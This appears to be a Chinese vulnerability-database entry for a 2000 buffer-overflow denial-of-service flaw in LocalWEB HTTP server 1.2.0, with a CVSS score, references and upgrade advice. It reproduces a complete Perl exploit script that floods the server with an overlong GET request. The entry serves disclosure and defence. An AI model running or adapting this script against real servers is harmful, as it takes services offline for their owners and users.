发布时间 :2000-07-05 00:00:00
修订时间 :2017-10-09 21:29:12

[原文]LocalWEB HTTP server 1.2.0 allows remote attackers to cause a denial of service via a long GET request.

[CNNVD]LocalWEB HTTP缓冲区溢出漏洞(CNNVD-200007-011)

        LocalWEB HTTP server 1.2.0版本存在漏洞。远程攻击者可以借助超长GET请求导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  1423
(VENDOR_ADVISORY)  BUGTRAQ  20000703 Remote DoS Attack in LocalWEB HTTP Server 1.2.0 Vulnerability
(UNKNOWN)  XF  localweb-get-bo

- 漏洞信息

LocalWEB HTTP缓冲区溢出漏洞
中危 边界条件错误
2000-07-05 00:00:00 2005-05-02 00:00:00
        LocalWEB HTTP server 1.2.0版本存在漏洞。远程攻击者可以借助超长GET请求导致服务拒绝。

- 公告与补丁

        West Street Software LocalWEB HTTP Server 1.2

- 漏洞信息 (20054)

West Street Software LocalWEB HTTP Server 1.2 Buffer Overflow (EDBID:20054)
windows dos
2000-07-04 Verified
0 Ussr Labs
N/A [点击下载]

LocalWEB is a freeware HTTP server for the Windows suite of operating systems. Certain versions of this software are vulnerable to a remotely exploitable buffer overflow attack. This attack can instrumented by sending the web server (via port 80) a malformed URL. The net result is a denial of service, however a remotely exploitable buffer overflow leading to a system compromise has not been ruled out. 

# ./$ -s <server>
# Malformed GET URL request DoS
use Getopt::Std;
use Socket;

getopts('s:', \%args);


$foo = "A"; # this is the NOP
$number = "10000"; # this is the total number of NOP
$data .= $foo x $number; # result of $foo times $number
$serv = $args{s}; # remote server
$port = 80; # remote port, default is 80
$buf = "GET /$data HTTP/1.0\r\n\r\n"; # issue this response to the

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("Data has been successfully sent to $serv\n");

sub usage {die("\n\n$0 -s <server>\n\n");} 

- 漏洞信息

LocalWEB HTTP Long Get Request Parsing Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

LocalWEB HTTP contains a flaw that may allow a remote denial of service. The issue is triggered when overly long GET request is sent to server, and will result in loss of availability for the LocalWEB HTTP server.

- 时间线

2000-07-04 2000-06-04
2000-07-04 Unknow

- 解决方案

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者